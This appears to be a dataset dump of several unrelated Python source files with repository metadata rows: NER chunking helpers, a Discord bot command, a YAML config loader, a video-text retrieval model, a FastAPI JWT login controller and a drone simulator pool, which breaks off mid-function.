x_batch, y_batch = [], []
if type(x[0]) == tuple:
x = zip(*x)
x_batch += [x]
y_batch += [y]
if len(x_batch) != 0:
yield x_batch, y_batch
def getChunkType(tok, idxToTag):
tagName = idxToTag[tok]
tagClass = tagName.split('-')[0]
tagType = tagName.split('-')[-1]
return tagClass, tagType
def getChunks(seq, tags):
"""Given a sequence of tags, group entities and their position
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunkType, chunkStart, chunkEnd)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = tags[NONE]
idxToTag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunkType, chunkStart = None, None
for i, tok in enumerate(seq):
# End of a chunk 1
if tok == default and chunkType is not None:
# Add a chunk.
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tokChunkClass, tokChunkType = getChunkType(tok, idxToTag)
if chunkType is None:
chunkType, chunkStart = tokChunkType, i
elif tokChunkType != chunkType or tokChunkClass == "B":
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = tokChunkType, i
else:
pass
# end condition
if chunkType is not None:
chunk = (chunkType, chunkStart, len(seq))
chunks.append(chunk)
return chunks
| 32.784314 | 84 | 0.55323 | 1,767 | 0.211364 | 1,334 | 0.159569 | 0 | 0 | 0 | 0 | 1,071 | 0.12811 |
6a1710262c6a5f82f36fe3fcc5a0ae77374c7e1e | 148 | py | Python | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 2 | 2018-03-15T14:39:53.000Z | 2018-03-15T20:34:14.000Z | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 6 | 2018-03-16T15:43:27.000Z | 2020-05-19T19:42:32.000Z | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 3 | 2018-03-16T15:36:57.000Z | 2020-05-19T19:34:47.000Z | import nox
FILE_PATHS = ["utils", "main.py"]
@nox.session
def format(session):
session.install("black")
session.run("black", *FILE_PATHS)
| 16.444444 | 37 | 0.675676 | 0 | 0 | 0 | 0 | 100 | 0.675676 | 0 | 0 | 30 | 0.202703 |
6a177f73dcbbd6c1d2721285cc1b7c72b4784fb1 | 2,781 | py | Python | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | 1 | 2022-02-18T04:02:52.000Z | 2022-02-18T04:02:52.000Z | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | null | null | null | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | null | null | null | import os
import df2img
import disnake
import pandas as pd
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.economy import wsj_model
async def currencies_command(ctx):
"""Currencies overview [Wall St. Journal]"""
try:
# Debug user input
if cfg.DEBUG:
logger.debug("econ-currencies")
# Retrieve data
df = wsj_model.global_currencies()
df = pd.DataFrame.from_dict(df)
# Check for argument
if df.empty:
raise Exception("No available data found")
df["Last"] = pd.to_numeric(df["Last"].astype(float))
df["Chng"] = pd.to_numeric(df["Chng"].astype(float))
df["%Chng"] = pd.to_numeric(df["%Chng"].astype(float))
formats = {"Last": "{:.2f}", "Chng": "{:.2f}", "%Chng": "{:.2f}%"}
for col, value in formats.items():
df[col] = df[col].map(lambda x: value.format(x)) # pylint: disable=W0640
df = df.fillna("")
df.set_index(" ", inplace=True)
# Debug user output
if cfg.DEBUG:
logger.debug(df.to_string())
df = df[
[
"Last",
"Chng",
"%Chng",
]
]
dindex = len(df.index)
fig = df2img.plot_dataframe(
df,
fig_size=(800, (40 + (40 * dindex))),
col_width=[8, 3, 3],
tbl_cells=dict(
align="left",
height=35,
),
template="plotly_dark",
font=dict(
family="Consolas",
size=20,
),
paper_bgcolor="rgba(0, 0, 0, 0)",
)
imagefile = "econ-currencies.png"
df2img.save_dataframe(fig=fig, filename=imagefile)
image = Image.open(imagefile)
image = autocrop_image(image, 0)
image.save(imagefile, "PNG", quality=100)
image = disnake.File(imagefile)
title = "Economy: [WSJ] Currencies"
embed = disnake.Embed(title=title, colour=cfg.COLOR)
embed.set_image(url=f"attachment://{imagefile}")
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
os.remove(imagefile)
await ctx.send(embed=embed, file=image)
except Exception as e:
embed = disnake.Embed(
title="ERROR Economy: [WSJ] Currencies",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed, delete_after=30.0)
| 27.81 | 85 | 0.54297 | 0 | 0 | 0 | 0 | 0 | 0 | 2,509 | 0.902193 | 447 | 0.160734 |
6a17d1c656acfd1f8102ff27381a0764e4f0a027 | 3,276 | py | Python | aiovectortiler/config_handler.py | shongololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 4 | 2016-07-24T20:39:40.000Z | 2018-12-26T06:43:35.000Z | aiovectortiler/config_handler.py | songololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 7 | 2016-08-10T16:27:39.000Z | 2018-10-13T13:16:24.000Z | aiovectortiler/config_handler.py | songololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 3 | 2016-08-09T03:12:24.000Z | 2016-11-08T01:17:29.000Z | import os
import yaml
import logging
logger = logging.getLogger(__name__)
class Configs:
server = None
recipes = {}
DB = None
plugins = None
@classmethod
def init_server_configs(cls, server_configs):
with open(server_configs) as s_c:
            cls.server = yaml.safe_load(s_c.read())
@classmethod
def init_layer_recipes(cls, recipe_configs):
recipe_name = None
if '/' in recipe_configs:
recipe_name = os.path.normpath(recipe_configs).split('/')[-1]
# for windows
elif '\\' in recipe_configs:
recipe_name = os.path.normpath(recipe_configs).split('\\')[-1]
if recipe_name[-4:] == '.yml':
recipe_name = recipe_name[:-4]
elif recipe_name[-5:] == '.yaml':
recipe_name = recipe_name[:-5]
else:
raise FileExistsError('File in layer recipes folder does not have a YAML extension: {0}'.format(recipe_configs))
with open(recipe_configs) as r_c:
            load_recipe = yaml.safe_load(r_c.read())
cls.recipes[recipe_name] = Recipe(load_recipe)
# add the recipe name based on the file name
# this is needed by the tilejson query
cls.recipes[recipe_name].name = recipe_name
logger.info('Adding layer: {0}'.format(recipe_name))
'''
Plugins.load()
Plugins.hook('before_load', config=Configs)
def load_recipe(data):
name = data.get('name', 'default')
if name in RECIPES:
raise ValueError('Recipe with name {} already exist'.format(name))
data['name'] = name
RECIPES[name] = Recipe(data)
if len(RECIPES) == 1 and name != 'default':
RECIPES['default'] = RECIPES[data['name']]
for recipe in Configs.layers:
with Path(recipe).open() as f:
load_recipe(yaml.load(f.read()))
Plugins.hook('load', config=config, recipes=RECIPES)
'''
# the following model structures for recipes / layers / queries allows searching up the chain
# for attributes. If not found in the root recipes level then it will check the server configs.
class Recipe(dict):
def __init__(self, data):
super().__init__(data)
self.load_layers(data['layers'])
def load_layers(self, layers):
self.layers = {}
for layer in layers:
self.layers[layer['name']] = Layer(self, layer)
def __getattr__(self, attr):
return self.get(attr, Configs.server.get(attr, None))
class Layer(dict):
def __init__(self, recipe, layer_data):
self.recipe = recipe
super().__init__(layer_data)
self.load_queries(layer_data['queries'])
def load_queries(self, queries):
self.queries = []
for query in queries:
self.queries.append(Query(self, query))
def __getattr__(self, attr):
return self.get(attr, getattr(self.recipe, attr))
@property
def id(self):
return '{0}:{1}'.format(self.recipe.name, self.name)
@property
def description(self):
return self.get('description', 'no description provided')
class Query(dict):
def __init__(self, layer, data):
self.layer = layer
super().__init__(data)
def __getattr__(self, attr):
return self.get(attr, getattr(self.layer, attr))
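# Illustrative note (added; not in the original module): attribute lookups fall back up the
# chain Query -> Layer -> Recipe -> Configs.server. For example, assuming a recipe YAML that
# sets `srid` only at the recipe level, `query.srid` resolves via Query.__getattr__ to the
# Layer, then to the Recipe, and finally to Configs.server.get('srid') if it is never defined.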
| 28.99115 | 124 | 0.626984 | 2,451 | 0.748168 | 0 | 0 | 1,355 | 0.413614 | 0 | 0 | 1,012 | 0.308913 |
6a17dd33b700261e4940d552334d981b6c74eaed | 128 | py | Python | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 271 | 2020-05-22T11:05:19.000Z | 2022-02-27T13:57:38.000Z | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 16 | 2020-06-28T09:54:07.000Z | 2022-01-18T09:08:07.000Z | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 34 | 2020-05-22T11:08:29.000Z | 2021-12-18T22:47:06.000Z | from .torch2onnx import torch2onnx
from .onnx2trt import onnx2trt
from .torch2trt import torch2trt
from .base import load, save
| 25.6 | 34 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a17e7c4a91ac2e9483c7bdc29806cbac3d7a40c | 13,237 | py | Python | t2vretrieval/models/mlmatch.py | Roc-Ng/HANet | e679703e9e725205424d87f750358fb4f62ceec5 | [
"MIT"
] | 34 | 2021-07-26T12:22:05.000Z | 2022-03-08T03:49:33.000Z | t2vretrieval/models/mlmatch.py | hexiangteng/HANet | 31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831 | [
"MIT"
] | null | null | null | t2vretrieval/models/mlmatch.py | hexiangteng/HANet | 31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831 | [
"MIT"
] | 3 | 2021-08-03T06:00:26.000Z | 2021-12-27T03:26:12.000Z | import numpy as np
import torch
import framework.ops
import t2vretrieval.encoders.mlsent
import t2vretrieval.encoders.mlvideo
import t2vretrieval.models.globalmatch
from t2vretrieval.models.criterion import cosine_sim
from t2vretrieval.models.globalmatch import VISENC, TXTENC
class RoleGraphMatchModelConfig(t2vretrieval.models.globalmatch.GlobalMatchModelConfig):
def __init__(self):
super().__init__()
self.num_verbs = 4
self.num_nouns = 6
self.attn_fusion = 'embed' # sim, embed
self.simattn_sigma = 4
self.hard_topk = 1
self.max_violation = True
self.loss_weights = None
## this config will be covered by model.json due to the functions of load and load_from_dict
self.subcfgs[VISENC] = t2vretrieval.encoders.mlvideo.MultilevelEncoderConfig()
self.subcfgs[TXTENC] = t2vretrieval.encoders.mlsent.RoleGraphEncoderConfig()
class RoleGraphMatchModel(t2vretrieval.models.globalmatch.GlobalMatchModel):
def build_submods(self):
return {
VISENC: t2vretrieval.encoders.mlvideo.MultilevelEncoder(self.config.subcfgs[VISENC]),
TXTENC: t2vretrieval.encoders.mlsent.RoleGraphEncoder(self.config.subcfgs[TXTENC])
}
def forward_video_embed(self, batch_data):
vid_fts = torch.FloatTensor(batch_data['attn_fts']).to(self.device)
vid_lens = torch.LongTensor(batch_data['attn_lens']).to(self.device)
# (batch, max_vis_len, dim_embed)
vid_sent_embeds, vid_verb_embeds, vid_noun_embeds, local_sent_embeds, logits, max_len = self.submods[VISENC](vid_fts, vid_lens)
return {
'vid_sent_embeds': vid_sent_embeds,
'vid_verb_embeds': vid_verb_embeds,
'vid_noun_embeds': vid_noun_embeds,
'local_vid_embeds': local_sent_embeds,
'vid_lens': vid_lens,
'max_len': max_len,
'logits': logits,
}
def forward_text_embed(self, batch_data):
sent_ids = torch.LongTensor(batch_data['sent_ids']).to(self.device) ## sentence
sent_lens = torch.LongTensor(batch_data['sent_lens']).to(self.device) ## length
verb_masks = torch.BoolTensor(batch_data['verb_masks']).to(self.device) ## batch*nv*max_sen_len
noun_masks = torch.BoolTensor(batch_data['noun_masks']).to(self.device)
node_roles = torch.LongTensor(batch_data['node_roles']).to(self.device) ## batch*(n_v+n_n)
rel_edges = torch.FloatTensor(batch_data['rel_edges']).to(self.device) ## batch*(1+n_v+n_n)*(1+n_v+n_n)
verb_lens = torch.sum(verb_masks, 2)
noun_lens = torch.sum(noun_masks, 2)
# sent_embeds: (batch, dim_embed)
# verb_embeds, noun_embeds: (batch, num_xxx, dim_embed)
sent_embeds, verb_embeds, noun_embeds, local_sent_embeds, sent_logits = self.submods[TXTENC](
sent_ids, sent_lens, verb_masks, noun_masks, node_roles, rel_edges)
return {
'sent_embeds': sent_embeds, 'sent_lens': sent_lens,
'verb_embeds': verb_embeds, 'verb_lens': verb_lens,
'noun_embeds': noun_embeds, 'noun_lens': noun_lens,
'sent_logits': sent_logits, 'local_sent_embeds': local_sent_embeds,
}
def generate_phrase_scores(self, vid_embeds, vid_masks, phrase_embeds, phrase_masks, mask_flag=False):
'''Args:
- vid_embeds: (batch, num_frames, embed_size)
- vid_masks: (batch, num_frames)
- phrase_embeds: (batch, num_phrases, embed_size)
- phrase_masks: (batch, num_phrases)
'''
batch_vids, num_frames, _ = vid_embeds.size()
vid_pad_masks = (vid_masks == 0).unsqueeze(1).unsqueeze(3)
batch_phrases, num_phrases, dim_embed = phrase_embeds.size()
# compute component-wise similarity
vid_2d_embeds = vid_embeds.view(-1, dim_embed)
phrase_2d_embeds = phrase_embeds.view(-1, dim_embed)
# size = (batch_vids, batch_phrases, num_frames, num_phrases)
ground_sims = cosine_sim(vid_2d_embeds, phrase_2d_embeds).view(
batch_vids, num_frames, batch_phrases, num_phrases).transpose(1, 2)
###
if mask_flag:
vid_attn_per_word = ground_sims.masked_fill(vid_pad_masks, 0) ##############
else:
vid_attn_per_word = ground_sims
vid_attn_per_word[vid_attn_per_word < 0] = 0
vid_attn_per_word = framework.ops.l2norm(vid_attn_per_word, dim=2)
if mask_flag:
vid_attn_per_word = vid_attn_per_word.masked_fill(vid_pad_masks, -1e18) #################
vid_attn_per_word = torch.softmax(self.config.simattn_sigma * vid_attn_per_word, dim=2)
if self.config.attn_fusion == 'embed':
vid_attned_embeds = torch.einsum('abcd,ace->abde', vid_attn_per_word, vid_embeds)
word_attn_sims = torch.einsum('abde,bde->abd',
framework.ops.l2norm(vid_attned_embeds),
framework.ops.l2norm(phrase_embeds))
elif self.config.attn_fusion == 'sim':
# (batch_vids, batch_phrases, num_phrases)
word_attn_sims = torch.sum(ground_sims * vid_attn_per_word, dim=2)
# sum: (batch_vid, batch_phrases)
phrase_scores = torch.sum(word_attn_sims * phrase_masks.float().unsqueeze(0), 2) \
/ torch.sum(phrase_masks, 1).float().unsqueeze(0).clamp(min=1)
return phrase_scores
def generate_scores(self, **kwargs):
##### shared #####
vid_lens = kwargs['vid_lens'] # (batch, )
num_frames = int(kwargs['max_len'])###########################kwargs['vid_verb_embeds'].size(1)
vid_masks = framework.ops.sequence_mask(vid_lens, num_frames, inverse=False)
# batch*max_len
##### sentence-level scores #####
sent_scores = cosine_sim(kwargs['vid_sent_embeds'], kwargs['sent_embeds'])
#######################################################
# concept scores use jaccard similarity
concept_verb_scores = self.jaccard_sim(kwargs['logits'][0], kwargs['sent_logits'][0])
concept_noun_scores = self.jaccard_sim(kwargs['logits'][1], kwargs['sent_logits'][1])
#######################################################
##### verb-level scores #####
vid_verb_embeds = kwargs['vid_verb_embeds'] # (batch, num_frames, dim_embed)
verb_embeds = kwargs['verb_embeds'] # (batch, num_verbs, dim_embed)
verb_lens = kwargs['verb_lens'] # (batch, num_verbs)
local_vid_embeds =kwargs['local_vid_embeds']
local_sent_embeds = kwargs['local_sent_embeds']
verb_masks = framework.ops.sequence_mask(torch.sum(verb_lens > 0, 1).long(),
self.config.num_verbs, inverse=False)
# sum: (batch_vids, batch_sents)
verb_scores = self.generate_phrase_scores(vid_verb_embeds, vid_masks, verb_embeds, verb_masks)
ind_verb_scores = self.generate_phrase_scores(local_vid_embeds[0], vid_masks, local_sent_embeds[0], verb_masks, True)
##### noun-level scores #####
vid_noun_embeds = kwargs['vid_noun_embeds'] # (batch, num_frames, dim_embed)
noun_embeds = kwargs['noun_embeds'] # (batch, num_nouns, dim_embed)
noun_lens = kwargs['noun_lens'] # (batch, num_nouns)
noun_masks = framework.ops.sequence_mask(torch.sum(noun_lens > 0, 1).long(),
self.config.num_nouns, inverse=False)
# sum: (batch_vids, batch_sents)
noun_scores = self.generate_phrase_scores(vid_noun_embeds, vid_masks, noun_embeds, noun_masks)
ind_noun_scores = self.generate_phrase_scores(local_vid_embeds[1], vid_masks, local_sent_embeds[1], noun_masks, True)
return sent_scores, verb_scores, noun_scores, concept_verb_scores, concept_noun_scores, ind_verb_scores, ind_noun_scores
def jaccard_sim(self, im, s):
im_bs = im.size(0)
s_bs = s.size(0)
im = im.unsqueeze(1).expand(-1, s_bs, -1)
s = s.unsqueeze(0).expand(im_bs, -1, -1)
intersection = torch.min(im, s).sum(-1)
union = torch.max(im, s).sum(-1)
score = intersection / union
return score
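  # Worked example for jaccard_sim (added for clarity; numbers are made up): with
  # im = [0.2, 0.8] and s = [0.5, 0.5], the soft intersection is the min-sum 0.2 + 0.5 = 0.7,
  # the soft union is the max-sum 0.5 + 0.8 = 1.3, and the score is 0.7 / 1.3 ~= 0.54.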
def forward_loss(self, batch_data, step=None):
enc_outs = self.forward_video_embed(batch_data)
cap_enc_outs = self.forward_text_embed(batch_data)
enc_outs.update(cap_enc_outs)
sent_scores, verb_scores, noun_scores, concept_verb_scores, concept_noun_scores, local_verb_scores, local_noun_scores = self.generate_scores(**enc_outs)
scores = (sent_scores + verb_scores + noun_scores + local_verb_scores + local_noun_scores) / 5
scores2 = (concept_verb_scores + concept_noun_scores) / 2
sent_loss = self.criterion(sent_scores)
verb_loss = self.criterion(verb_scores)
noun_loss = self.criterion(noun_scores)
eta = 0.1
mu = 0.01
concept_verb_loss = 0.5*self.criterion(concept_verb_scores)
concept_noun_loss = 0.5*self.criterion(concept_noun_scores)
concept_loss = eta*self.criterion(scores2)
verb_concept_label = torch.FloatTensor(batch_data['verb_concept_label']).to(self.device)
noun_concept_label = torch.FloatTensor(batch_data['noun_concept_label']).to(self.device)
verb_concept_mask = torch.FloatTensor(batch_data['verb_concept_mask']).to(self.device)
noun_concept_mask = torch.FloatTensor(batch_data['noun_concept_mask']).to(self.device)
v_mask_sum = torch.sum(verb_concept_mask, dim=1)
n_mask_sum = torch.sum(noun_concept_mask, dim=1)
vbce_loss = torch.sum(verb_concept_mask*self.criterion_bce(enc_outs['logits'][0], verb_concept_label), dim=1)
vbce_loss = mu*torch.mean(vbce_loss/v_mask_sum)
nbce_loss = torch.sum(noun_concept_mask*self.criterion_bce(enc_outs['logits'][1], noun_concept_label), dim=1)
nbce_loss = mu*torch.mean(nbce_loss/n_mask_sum)
vbce_sent_loss = torch.sum(verb_concept_mask*self.criterion_bce(enc_outs['sent_logits'][0], verb_concept_label), dim=1)
vbce_sent_loss = mu*torch.mean(vbce_sent_loss/v_mask_sum)
nbce_sent_loss = torch.sum(noun_concept_mask*self.criterion_bce(enc_outs['sent_logits'][1], noun_concept_label), dim=1)
nbce_sent_loss = mu*torch.mean(nbce_sent_loss/n_mask_sum)
fusion_loss = self.criterion(scores)
if self.config.loss_weights is None:
loss = fusion_loss + 1*(vbce_loss+nbce_loss) + 1*(vbce_sent_loss+nbce_sent_loss) + concept_loss
else:
loss = self.config.loss_weights[0] * fusion_loss + \
self.config.loss_weights[1] * sent_loss + \
self.config.loss_weights[2] * verb_loss + \
self.config.loss_weights[3] * noun_loss + \
vbce_loss + nbce_loss
if step is not None and self.config.monitor_iter > 0 and step % self.config.monitor_iter == 0:
neg_scores = scores.masked_fill(torch.eye(len(scores), dtype=torch.bool).to(self.device), -1e10)
self.print_fn('\tstep %d: pos mean scores %.2f, hard neg mean scores i2t %.2f, t2i %.2f'%(
step, torch.mean(torch.diag(scores)), torch.mean(torch.max(neg_scores, 1)[0]),
torch.mean(torch.max(neg_scores, 0)[0])))
self.print_fn('\tstep %d: sent_loss %.4f, verb_loss %.4f, noun_loss %.4f, fusion_loss %.4f'%(
step, sent_loss.data.item(), verb_loss.data.item(), noun_loss.data.item(), fusion_loss.data.item()))
self.print_fn('\tstep %d: vbce_loss %.4f, nbce_loss %.4f'%(step, vbce_loss.item(), nbce_loss.item()))
self.print_fn('\tstep %d: vbce_sent_loss %.4f, nbce_sent_loss %.4f'%(step, vbce_sent_loss.item(), nbce_sent_loss.item()))
self.print_fn('\tstep %d: sim_loss %.4f, vsim_loss %.4f, nsim_loss %.4f'%(step, concept_loss.item(),
concept_verb_loss.item(), concept_noun_loss.item()))
return loss
def evaluate_scores(self, tst_reader):
K = self.config.subcfgs[VISENC].num_levels
K = K + 4
assert K == 7, 'Note that this error indicates losing other scores!'
vid_names, all_scores = [], [[] for _ in range(K)]
cap_names = tst_reader.dataset.captions
for vid_data in tst_reader:
vid_names.extend(vid_data['names'])
vid_enc_outs = self.forward_video_embed(vid_data)
for k in range(K):
all_scores[k].append([])
ijj = 0
for cap_data in tst_reader.dataset.iterate_over_captions(self.config.tst_batch_size):
cap_enc_outs = self.forward_text_embed(cap_data)
cap_enc_outs.update(vid_enc_outs)
indv_scores = self.generate_scores(**cap_enc_outs)
for k in range(K):
all_scores[k][-1].append(indv_scores[k].data.cpu().numpy())
ijj += 0
for k in range(K):
all_scores[k][-1] = np.concatenate(all_scores[k][-1], axis=1)
for k in range(K):
all_scores[k] = np.concatenate(all_scores[k], axis=0) # (n_img, n_cap)
all_scores = np.array(all_scores) # (k, n_img, n_cap)
return vid_names, cap_names, all_scores
def evaluate(self, tst_reader, return_outs=False):
vid_names, cap_names, scores = self.evaluate_scores(tst_reader)
i2t_gts = []
for vid_name in vid_names:
i2t_gts.append([])
for i, cap_name in enumerate(cap_names):
if cap_name in tst_reader.dataset.ref_captions[vid_name]:
i2t_gts[-1].append(i)
t2i_gts = {}
for i, t_gts in enumerate(i2t_gts):
for t_gt in t_gts:
t2i_gts.setdefault(t_gt, [])
t2i_gts[t_gt].append(i)
idx = [0, 1, 2, 5, 6]
fused_scores = (np.mean(scores[idx], 0) + np.mean(scores[3:5], 0))/2
metrics = self.calculate_metrics(fused_scores, i2t_gts, t2i_gts)
if return_outs:
outs = {
'vid_names': vid_names,
'cap_names': cap_names,
'scores': scores,
}
return metrics, outs
else:
return metrics
| 46.939716 | 156 | 0.694568 | 12,949 | 0.978243 | 0 | 0 | 0 | 0 | 0 | 0 | 2,402 | 0.181461 |
6a186a13afeea2c9ca39fb78982684eb10c871db | 3,784 | py | Python | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 1 | 2021-10-14T07:27:47.000Z | 2021-10-14T07:27:47.000Z | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 4 | 2019-08-06T02:26:32.000Z | 2021-06-10T21:39:19.000Z | bench_fastapi/authentication/controllers/login.py | sharkguto/teste_carga | 56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb | [
"MIT"
] | 1 | 2018-05-11T18:04:41.000Z | 2018-05-11T18:04:41.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas ([email protected])
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
router = APIRouter()
security = HTTPBasic(auto_error=True)
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
@router.post("/login", tags=["token"])
async def check_token(
response: Response,
user: dict = Depends(verify_token),
x_api_key: str = Header(None),
):
response.headers["x-api-key"] = x_api_key
return {"verified": True, "user": user["email"]}
@router.put("/login", tags=["token"])
async def renew_token(response: Response, user: dict = Depends(verify_token)):
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{user['email']}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return {"renew": True}
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
@router.get(
"/login", response_model=User, tags=["auth"], response_model_exclude_unset=True
)
async def login_basic(
response: Response, authorization: HTTPBasicCredentials = Security(security)
):
sql = """SELECT tu.id, tu.email, tu."name", tu.linkedin_id , tu.pwd_updated_at
FROM users.tbl_users tu
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email
AND tu.enabled = true """
users = await database.fetch_one(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not users:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user = jsonable_encoder(users)
sql = """SELECT tp.acl_profile as profile
FROM users.tbl_users tu inner join
users.tbl_profile_users tpu on tpu.id_users = tu.id inner join
users.tbl_profile tp on tp.id = tpu.id_profile
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email"""
profiles = await database.fetch_all(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not profiles:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user["acl"] = jsonable_encoder(profiles)
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{authorization.username}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return user
| 29.795276 | 83 | 0.681818 | 0 | 0 | 0 | 0 | 2,721 | 0.71908 | 2,545 | 0.672569 | 1,317 | 0.348044 |
6a190e5eb1440e6a01fc6f170da74507f39571ac | 6,295 | py | Python | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | 1 | 2019-03-24T23:50:07.000Z | 2019-03-24T23:50:07.000Z | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | null | null | null | dronesym-python/flask-api/src/dronepool.py | dilinade/DroneSym | 30073bd31343bc27c6b8d72e48b4e06ced0c5fe6 | [
"Apache-2.0"
] | null | null | null | #DronePool module which handles interaction with SITLs
from dronekit import Vehicle, VehicleMode, connect
from dronekit_sitl import SITL
from threading import Lock
import node, time
import mavparser
import threadrunner
drone_pool = {}
instance_count = 0
env_test = False
q = None
mq = None
lock = Lock()
class Sim(SITL, object):
def __init__(self, instance=1, home=None):
super(Sim, self).download("copter", "3.3", verbose=not env_test)
self.instance = instance
if home:
self.home = home
else:
self.home = {"lat":6.9271, "lon":79.8612, "alt": 1}
self.p = None
return
def connection_string(self):
return super(Sim, self).connection_string()[:-4] + str(5760 + self.instance * 10)
def launch(self):
home_str = str(self.home['lat']) + ',' + str(self.home['lon']) + ',0,353'
super(Sim, self).launch(["--instance", str(self.instance), "--home", home_str], await_ready=True, verbose=not env_test)
def get_sitl_status(self):
return { 'id': self.instance, 'home': self.home }
def initialize():
global q, mq, instance_count
q = threadrunner.q
mq = threadrunner.mq
drones = node.get_drones()['drones']
if not drones:
return
for drone_id in drones:
if drone_id not in list(drone_pool.keys()):
drone = node.get_drone_by_id(drone_id)
location = drone['location']
q.put((create_new_drone, { "db_key" : drone_id, "home" : location }))
if 'status' in list(drone.keys()) and drone['status'] == 'FLYING':
q.put((resume_flight, { "drone_id" : drone_id }))
def resume_flight(kwargs):
drone_id = kwargs.get("drone_id", None)
drone = node.get_drone_by_id(drone_id)
waypoints = []
for wp in sorted(drone['waypoints']):
waypoints.append(drone['waypoints'][wp])
next_waypoint = waypoints.index(drone['waypoint'])
print (next_waypoint)
q.put((takeoff_drone, { "drone_id" : drone_id, "waypoints" : waypoints[next_waypoint:] }))
def create_new_drone(kwargs):
global instance_count
instance_count += 1
home = kwargs.get("home", None)
db_key = kwargs.get("db_key", None)
retries = 3
drone = Sim(instance_count, home)
drone.launch()
while retries > 0:
try:
drone_conn = connect(drone.connection_string(), wait_ready=True)
break
except:
print ("Retrying...")
retries -= 1
drone_pool[db_key] = drone_conn
res = { "status" : "OK", "id" : db_key }
return res
def remove_drone(kwargs):
drone_id = kwargs.get("drone_id", None)
if drone_id not in drone_pool:
return { "status" : "ERROR", "msg" : "Drone instance not found" }
drone = drone_pool[drone_id]
if drone.mode == VehicleMode('AUTO'):
return { "status" : "ERROR", "msg" : "Drone in operation" }
